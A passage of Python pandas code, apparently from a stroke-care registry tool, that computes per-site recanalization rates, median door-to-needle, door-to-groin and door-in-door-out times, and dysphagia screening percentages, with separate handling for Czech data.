#self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/(x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] - x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] - x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre']) > 0 else 0, axis=1)
self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/x['denominator']) * 100), 2) if x['denominator'] > 0 else 0, axis=1)
self.statsDf.drop(['denominator'], inplace=True, axis=1)
else:
self.statsDf['# patients recanalized'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'], axis=1)
self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/(x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] - x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] - x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre']) > 0 else 0, axis=1)
"""
##############
# MEDIAN DTN #
##############
def _median_confidence_interval(data, confidence=0.95):
""" The function calculating median confidence interval.
:param confidence: the value of confidence interval
:type confidence: int/float
:returns: rv.median(), rv.interval(confidence)
"""
a = np.array(data)
w = a + 1
# create custom discrete random variable from data set
rv = st.rv_discrete(values=(data, w/w.sum()))
return rv.median(), rv.interval(confidence)
def _mean_confidence_interval(data, confidence=0.95):
""" The function calculating mean confidence interval.
:param confidence: the value of confidence interval
:type confidence: int/float
:returns: m, m-h, m+h
"""
n = len(data)
m = mean(data)
std_err = sem(data)
h = std_err * t.ppf((1 + confidence) / 2, n - 1)
return m, m-h, m+h
# tag::median_dtn[]
# Calculate number of patients who underwent IVT
# In-hospital strokes (HOSPITAL_STROKE_IVT_TIMESTAMPS == 1) are excluded from
# the door-to-needle statistics.
self.tmp = isch.loc[~isch['HOSPITAL_STROKE_IVT_TIMESTAMPS'].isin([1])].groupby(['Protocol ID', 'IVT_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="IVT_DONE", value=1, new_column_name='# IV tPa')
self.statsDf['% IV tPa'] = self.statsDf.apply(lambda x: round(((x['# IV tPa']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_iv_tpa = isch.loc[(isch['IVT_DONE'].isin([1])) & (~isch['HOSPITAL_STROKE_IVT_TIMESTAMPS'].isin([1]))].copy()
# recanalization_procedure_iv_tpa = isch.loc[isch['IVT_DONE'].isin([1])].copy()
recanalization_procedure_iv_tpa.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
# Only DTN times in the range (0, 400] minutes are used for the median:
# zeros (filled-in missing values) and implausibly long times are dropped.
thrombolysis = recanalization_procedure_iv_tpa[(recanalization_procedure_iv_tpa['IVTPA'] > 0) & (recanalization_procedure_iv_tpa['IVTPA'] <= 400)].copy()
tmp = thrombolysis.groupby(['Protocol ID']).IVTPA.agg(['median']).rename(columns={'median': 'Median DTN (minutes)'}).reset_index()
# Outer merge keeps sites without any thrombolysed patients; fillna turns
# their missing median into 0
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
del thrombolysis
# end::median_dtn[]
"""
if country_code == 'CZ':
self.tmp = isch.groupby(['Protocol ID', 'IVT_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="IVT_DONE", value=1, new_column_name='# IV tPa')
self.statsDf['% IV tPa'] = self.statsDf.apply(lambda x: round(((x['# IV tPa']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_iv_tpa = isch[isch['IVT_DONE'].isin([1])].copy()
recanalization_procedure_iv_tpa.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
thrombolysis = recanalization_procedure_iv_tpa[(recanalization_procedure_iv_tpa['IVTPA'] > 0) & (recanalization_procedure_iv_tpa['IVTPA'] <= 400)].copy()
tmp = thrombolysis.groupby(['Protocol ID']).IVTPA.agg(['median']).rename(columns={'median': 'Median DTN (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
else:
self.statsDf.loc[:, '# IV tPa'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'], axis=1)
self.statsDf['% IV tPa'] = self.statsDf.apply(lambda x: round(((x['# IV tPa']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_iv_tpa = isch[isch['RECANALIZATION_PROCEDURES'].isin([2, 3, 5])].copy()
recanalization_procedure_iv_tpa.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
recanalization_procedure_iv_tpa['IVTPA'] = recanalization_procedure_iv_tpa['IVT_ONLY_NEEDLE_TIME'] + recanalization_procedure_iv_tpa['IVT_ONLY_NEEDLE_TIME_MIN'] + recanalization_procedure_iv_tpa['IVT_TBY_NEEDLE_TIME'] + recanalization_procedure_iv_tpa['IVT_TBY_NEEDLE_TIME_MIN'] + recanalization_procedure_iv_tpa['IVT_TBY_REFER_NEEDLE_TIME'] + recanalization_procedure_iv_tpa['IVT_TBY_REFER_NEEDLE_TIME_MIN']
# sites_ids = recanalization_procedure_iv_tpa['Protocol ID'].tolist()
# sites_ids = set(sites_ids)
# interval_vals = {}
# for idx, val in enumerate(sites_ids):
# meanv, lbound, ubound = _mean_confidence_interval(recanalization_procedure_iv_tpa[recanalization_procedure_iv_tpa['Protocol ID'] == val]['IVTPA'].tolist())
# medianv, interval_median = _median_confidence_interval(recanalization_procedure_iv_tpa[recanalization_procedure_iv_tpa['Protocol ID'] == val]['IVTPA'].tolist())
# interval_vals[str(idx)] = [val, "({0:.2f},{1:.2f})".format(lbound, ubound), "{0}".format(interval_median)]
# #interval_vals.append("{0}: ({1}-{2})".format(i, lowb, upb))
# #print(interval_vals)
# interval_vals_df = pd.DataFrame.from_dict(interval_vals, orient='index', columns=['Protocol ID', 'Confidence interval DTN (Mean)', 'Confidence interval DTN (Median)'])
tmp = recanalization_procedure_iv_tpa.groupby(['Protocol ID']).IVTPA.agg(['median']).rename(columns={'median': 'Median DTN (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
# self.statsDf = self.statsDf.merge(interval_vals_df, how='outer')
"""
##############
# MEDIAN DTG #
##############
# tag::median_dtg[]
# In-hospital strokes (HOSPITAL_STROKE_TBY_TIMESTAMPS == 1) are excluded from
# the door-to-groin statistics.
self.tmp = isch.loc[~isch['HOSPITAL_STROKE_TBY_TIMESTAMPS'].isin([1])].groupby(['Protocol ID', 'TBY_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="TBY_DONE", value=1, new_column_name='# TBY')
self.statsDf['% TBY'] = self.statsDf.apply(lambda x: round(((x['# TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombectomy
recanalization_procedure_tby_dtg = isch.loc[(isch['TBY_DONE'].isin([1])) & (~isch['HOSPITAL_STROKE_TBY_TIMESTAMPS'].isin([1]))].copy()
# recanalization_procedure_tby_dtg = isch.loc[isch['TBY_DONE'].isin([1])].copy()
recanalization_procedure_tby_dtg.fillna(0, inplace=True)
# Create one column with times of door to groin puncture
# Only DTG times in the range (0, 700] minutes are used for the median:
# zeros (filled-in missing values) and implausibly long times are dropped.
thrombectomy = recanalization_procedure_tby_dtg[(recanalization_procedure_tby_dtg['TBY'] > 0) & (recanalization_procedure_tby_dtg['TBY'] <= 700)].copy()
tmp = thrombectomy.groupby(['Protocol ID']).TBY.agg(['median']).rename(columns={'median': 'Median DTG (minutes)'}).reset_index()
# Outer merge keeps sites without any thrombectomised patients; fillna turns
# their missing median into 0
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
del thrombectomy
# end::median_dtg[]
"""
# Seperate calculation of TBY for CZ
if country_code == 'CZ':
self.tmp = isch.groupby(['Protocol ID', 'TBY_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="TBY_DONE", value=1, new_column_name='# TBY')
self.statsDf['% TBY'] = self.statsDf.apply(lambda x: round(((x['# TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_tby_dtg = isch[isch['TBY_DONE'].isin([1])].copy()
recanalization_procedure_tby_dtg.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
thrombectomy = recanalization_procedure_tby_dtg[(recanalization_procedure_tby_dtg['TBY'] > 0) & (recanalization_procedure_tby_dtg['TBY'] <= 700)].copy()
tmp = thrombectomy.groupby(['Protocol ID']).TBY.agg(['median']).rename(columns={'median': 'Median DTG (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
"""
# self.statsDf.loc[:, '# TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'], axis=1)
"""
self.statsDf.loc[:, '# TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - IV tPa + endovascular treatment'], axis=1)
self.statsDf['% TBY'] = self.statsDf.apply(lambda x: round(((x['# TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombectomy
# recanalization_procedure_tby_dtg = isch[isch['RECANALIZATION_PROCEDURES'].isin([4, 3, 6, 7, 8])].copy()
recanalization_procedure_tby_dtg = isch[isch['RECANALIZATION_PROCEDURES'].isin([4, 3])].copy()
recanalization_procedure_tby_dtg.fillna(0, inplace=True)
# Get IVTPA in minutes
# recanalization_procedure_tby_dtg['TBY'] = recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_TIME_MIN'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME_MIN'] + recanalization_procedure_tby_dtg['TBY_REFER_ALL_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_REFER_LIM_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_REFER_ALL_GROIN_PUNCTURE_TIME_MIN'] + recanalization_procedure_tby_dtg['TBY_REFER_LIM_GROIN_PUNCTURE_TIME_MIN']
recanalization_procedure_tby_dtg['TBY'] = recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_TIME_MIN'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME_MIN']
"""
# sites_ids = recanalization_procedure_tby_dtg['Protocol ID'].tolist()
# sites_ids = set(sites_ids)
# interval_vals = {}
# for idx, val in enumerate(sites_ids):
# meanv, lbound, ubound = _mean_confidence_interval(recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['Protocol ID'] == val]['TBY'].tolist())
# medianv, interval_median = _median_confidence_interval(recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['Protocol ID'] == val]['TBY'].tolist())
# interval_vals[str(idx)] = [val, "({0:.2f}-{1:.2f})".format(lbound, ubound), "{0}".format(interval_median)]
# interval_vals_df = pd.DataFrame.from_dict(interval_vals, orient='index', columns=['Protocol ID', 'Confidence interval DTG (Mean)', 'Confidence interval DTG (Median)'])
# recanalization_procedure_tby['TBY'] = recanalization_procedure_tby.loc[:, ['TBY_ONLY_GROIN_PUNCTURE_TIME', 'TBY_ONLY_GROIN_PUNCTURE_TIME_MIN', 'IVT_TBY_GROIN_TIME', 'IVT_TBY_GROIN_TIME_MIN']].sum(1).reset_index()[0].tolist()
"""
else:
self.statsDf.loc[:, '# TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - IV tPa + endovascular treatment'], axis=1)
self.statsDf['% TBY'] = self.statsDf.apply(lambda x: round(((x['# TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombectomy
recanalization_procedure_tby_dtg = isch[isch['RECANALIZATION_PROCEDURES'].isin([4, 3])].copy()
recanalization_procedure_tby_dtg.fillna(0, inplace=True)
# Create one column with times of door to thrombectomy
recanalization_procedure_tby_dtg['TBY'] = recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_TIME_MIN'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME_MIN']
# sites_ids = recanalization_procedure_tby_dtg['Protocol ID'].tolist()
# sites_ids = set(sites_ids)
# interval_vals = {}
# for idx, val in enumerate(sites_ids):
# meanv, lbound, ubound = _mean_confidence_interval(recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['Protocol ID'] == val]['IVTPA'].tolist())
# medianv, interval_median = _median_confidence_interval(recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['Protocol ID'] == val]['IVTPA'].tolist())
# interval_vals[str(idx)] = [val, "({0:.2f}-{1:.2f})".format(lbound, ubound), "{0}".format(interval_median)]
# interval_vals_df = pd.DataFrame.from_dict(interval_vals, orient='index', columns=['Protocol ID', 'Confidence interval DTG (Mean)', 'Confidence interval DTG (Median)'])
# recanalization_procedure_tby['TBY'] = recanalization_procedure_tby.loc[:, ['TBY_ONLY_GROIN_PUNCTURE_TIME', 'TBY_ONLY_GROIN_PUNCTURE_TIME_MIN', 'IVT_TBY_GROIN_TIME', 'IVT_TBY_GROIN_TIME_MIN']].sum(1).reset_index()[0].tolist()
tmp = recanalization_procedure_tby_dtg.groupby(['Protocol ID']).TBY.agg(['median']).rename(columns={'median': 'Median DTG (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
# self.statsDf = self.statsDf.merge(interval_vals_df, how='outer')
"""
###############
# MEDIAN DIDO #
###############
# tag::median_dido[]
# Door-in door-out (DIDO) time for patients referred to another centre
# (REFERRED_DONE == 1).
self.tmp = isch.groupby(['Protocol ID', 'REFERRED_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="REFERRED_DONE", value=1, new_column_name='# DIDO TBY')
self.statsDf['% DIDO TBY'] = self.statsDf.apply(lambda x: round(((x['# DIDO TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been referred
recanalization_procedure_tby_dido = isch[isch['REFERRED_DONE'].isin([1])].copy()
recanalization_procedure_tby_dido.fillna(0, inplace=True)
# Only positive DIDO times enter the median (zeros are filled-in missing values)
dido = recanalization_procedure_tby_dido[(recanalization_procedure_tby_dido['DIDO'] > 0)].copy()
tmp = dido.groupby(['Protocol ID']).DIDO.agg(['median']).rename(columns={'median': 'Median TBY DIDO (minutes)'}).reset_index()
# Outer merge keeps sites without referred patients; fillna turns their
# missing median into 0
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
del recanalization_procedure_tby_dido, dido
# end::median_dido[]
"""
if country_code == 'CZ':
# self.statsDf.loc[:, '# DIDO TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment'], axis=1)
self.statsDf.loc[:, '# DIDO TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'], axis=1)
# self.statsDf['% DIDO TBY'] = self.statsDf.apply(lambda x: round(((x['# DIDO TBY']/(x['isch_patients'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] - x['# recanalization procedures - Not done'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] - x['# recanalization procedures - Not done']) > 0 else 0, axis=1)
# Get only patients recanalized TBY
# recanalization_procedure_tby_dido = isch[isch['RECANALIZATION_PROCEDURES'].isin([5, 6, 7, 8])].copy()
# For CZ remove referred for endovascular treatment from DIDO time because they are taking it as the patient was referred to them for TBY
# recanalization_procedure_tby_dido = isch[isch['RECANALIZATION_PROCEDURES'].isin([5, 6])].copy()
# Create temporary dataframe with the patients who has been transferred for recanalization procedures
recanalization_procedure_tby_dido = isch[isch['RECANALIZATION_PROCEDURES'].isin([5, 6, 7, 8])].copy()
recanalization_procedure_tby_dido.fillna(0, inplace=True)
# Get DIDO in minutes
# recanalization_procedure_tby_dido['DIDO'] = recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME_MIN']
# recanalization_procedure_tby_dido['DIDO'] = recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME_MIN']
# Create one column with times of door-in door-out time
recanalization_procedure_tby_dido['DIDO'] = recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME_MIN']
tmp = recanalization_procedure_tby_dido.groupby(['Protocol ID']).DIDO.agg(['median']).rename(columns={'median': 'Median TBY DIDO (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
else:
self.statsDf.loc[:, '# DIDO TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'], axis=1)
# self.statsDf['% DIDO TBY'] = self.statsDf.apply(lambda x: round(((x['# DIDO TBY']/(x['isch_patients'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] - x['# recanalization procedures - Not done'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] - x['# recanalization procedures - Not done']) > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been transferred for recanalization procedures
recanalization_procedure_tby_dido = isch[isch['RECANALIZATION_PROCEDURES'].isin([5, 6, 7, 8])].copy()
recanalization_procedure_tby_dido.fillna(0, inplace=True)
# Create one column with times of door-in door-out time
recanalization_procedure_tby_dido['DIDO'] = recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME_MIN']
tmp = recanalization_procedure_tby_dido.groupby(['Protocol ID']).DIDO.agg(['median']).rename(columns={'median': 'Median TBY DIDO (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
"""
#######################
# DYSPHAGIA SCREENING #
#######################
# Per-site counts and percentages of dysphagia screening outcomes.
# DYSPHAGIA_SCREENING coding (per the values used below): 1 = GUSS test,
# 2 = Other test, 3 = screened at another centre, 4 = Not done,
# 5 = Unable to test, 6 = not known. "not known" answers are removed from
# the denominator of every other category.
# NOTE(review): each _get_values_for_factors() call presumably reads the
# grouped counts left in self.tmp by the groupby just above — confirm in
# the helper's definition.
# For CZ exclude CVT from the calculation
# tag::dysphagia_screening[]
if country_code == 'CZ':
    # CZ only: additionally drop patients entered via the CZ IVT/TBY form who
    # were referred to another centre (RECANALIZATION_PROCEDURES 5 or 6) —
    # screening for them is assumed to happen at the receiving hospital.
    is_ich_not_referred = is_ich.loc[~(is_ich['crf_parent_name'].isin(['F_RESQ_IVT_TBY_CZ_4']) & is_ich['RECANALIZATION_PROCEDURES'].isin([5,6]))].copy()
    self.statsDf['is_ich_not_referred_patients'] = self._count_patients(dataframe=is_ich_not_referred)
    self.tmp = is_ich_not_referred.groupby(['Protocol ID', 'DYSPHAGIA_SCREENING']).size().to_frame('count').reset_index()
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=6, new_column_name='# dysphagia screening - not known')
    self.statsDf['% dysphagia screening - not known'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - not known']/x['is_ich_not_referred_patients']) * 100), 2) if x['is_ich_not_referred_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=1, new_column_name='# dysphagia screening - Guss test')
    self.statsDf['% dysphagia screening - Guss test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Guss test']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=2, new_column_name='# dysphagia screening - Other test')
    self.statsDf['% dysphagia screening - Other test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Other test']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=3, new_column_name='# dysphagia screening - Another centre')
    self.statsDf['% dysphagia screening - Another centre'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Another centre']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=4, new_column_name='# dysphagia screening - Not done')
    self.statsDf['% dysphagia screening - Not done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Not done']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=5, new_column_name='# dysphagia screening - Unable to test')
    self.statsDf['% dysphagia screening - Unable to test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Unable to test']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    # CZ definition of "screening done" counts only on-site tests (GUSS/Other);
    # "Another centre" is deliberately excluded here (older variant kept below).
    # self.statsDf['# dysphagia screening done'] = self.statsDf['# dysphagia screening - Guss test'] + self.statsDf['# dysphagia screening - Other test'] + self.statsDf['# dysphagia screening - Another centre']
    self.statsDf['# dysphagia screening done'] = self.statsDf['# dysphagia screening - Guss test'] + self.statsDf['# dysphagia screening - Other test']
    # self.statsDf['% dysphagia screening done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening done']/(x['is_ich_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    # CZ "% done" denominator is done + Not done, i.e. only patients who could
    # have been screened on site.
    self.statsDf['% dysphagia screening done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening done']/(x['# dysphagia screening done'] + x['# dysphagia screening - Not done'])) * 100), 2) if (x['# dysphagia screening done'] + x['# dysphagia screening - Not done']) > 0 else 0, axis=1)
else:
    # Other countries: the is_ich_cvt cohort (CVT included) is the denominator.
    self.tmp = is_ich_cvt.groupby(['Protocol ID', 'DYSPHAGIA_SCREENING']).size().to_frame('count').reset_index()
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=6, new_column_name='# dysphagia screening - not known')
    self.statsDf['% dysphagia screening - not known'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - not known']/x['is_ich_cvt_patients']) * 100), 2) if x['is_ich_cvt_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=1, new_column_name='# dysphagia screening - Guss test')
    self.statsDf['% dysphagia screening - Guss test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Guss test']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=2, new_column_name='# dysphagia screening - Other test')
    self.statsDf['% dysphagia screening - Other test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Other test']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=3, new_column_name='# dysphagia screening - Another centre')
    self.statsDf['% dysphagia screening - Another centre'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Another centre']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=4, new_column_name='# dysphagia screening - Not done')
    self.statsDf['% dysphagia screening - Not done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Not done']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=5, new_column_name='# dysphagia screening - Unable to test')
    self.statsDf['% dysphagia screening - Unable to test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Unable to test']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
    # Unlike the CZ branch, "done" here also counts screening performed at
